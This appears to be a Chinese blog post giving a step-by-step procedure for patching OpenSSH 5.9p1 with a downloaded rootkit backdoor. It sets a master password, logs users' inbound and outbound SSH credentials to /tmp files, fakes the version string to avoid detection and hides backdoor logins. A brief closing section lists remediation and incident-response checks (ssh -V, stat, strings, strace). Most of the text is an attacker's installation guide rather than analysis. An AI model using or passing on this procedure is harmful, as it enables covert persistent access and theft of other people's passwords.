z0nek

关于我

安装步骤:

http://core.ipsecs.com/rootkit/patch-to-hack/0×06-openssh-5.9p1.patch.tar.gz
http://ftp.eu.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
安装前首先
ssh -V
[root@vincent tmp]# ssh -V
OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013
记录下原来ssh版本信息,免得安装后一看就版本不一样了

tar zxvf openssh-5.9p1.tar.gz

tar zxvf 0x06-openssh-5.9p1.patch.tar.gz

cd openssh-5.9p1.patch/

cp sshbd5.9p1.diff../openssh-5.9p1

cd ../openssh-5.9p1

patch < sshbd5.9p1.diff//patch 后门

vi includes.h //修改后门密码,记录文件位置,

/*

+#define ILOG "/tmp/ilog" //记录登录到本机的用户名和密码

+#define OLOG "/tmp/olog" //记录本机登录到远程的用户名和密码

+#define SECRETPW "123456654321" //你后门的密码

*/

vi version.h //修改SSH_VERSION,改成原来的OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013

 

先安装所需环境不然会报错

yum install -y openssl openssl-devel pam-devel

./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

注意要是出现:configure: error: *** zlib.h missing – please install first or check config.log
需要安装zlib
yum install -y zlib zlib-devel
make && make install
service sshd restart //重启sshd
然后我们登录ssh看看,不会记录使用后门密码登录的记录。

修复方案:
1)重装openssh软件
2)SSH禁止对外开放

应急响应:
1)比对ssh的版本
ssh -V
2)查看ssh配置文件和/usr/sbin/sshd的时间
stat /usr/sbin/sshd
3)strings检查/usr/sbin/sshd,看是否有邮箱信息
strings可以查看二进制文件中的字符串,在应急响应中是十分有用的。有些sshd后门会通过邮件发送登录信息,通过strings /usr/sbin/sshd可以查看到邮箱信息。
4)通过strace监控sshd进程读写文件的操作
一般的sshd后门都会将账户密码记录到文件,可以通过strace进程跟踪到ssh登录密码文件。

ps axu | grep sshd | grep -v grep

root 655300.00.1484281260?Ss13:430:00/usr/sbin/sshd

strace -o aa -ff -p 65530

grep open aa*| grep -v -e No-e null-e denied| grep WR

aa.102586:open("/tmp/ilog", O_WRONLY|O_CREAT|O_APPEND,0666)=4


标签:后门

评论
© z0nek | Powered by LOFTER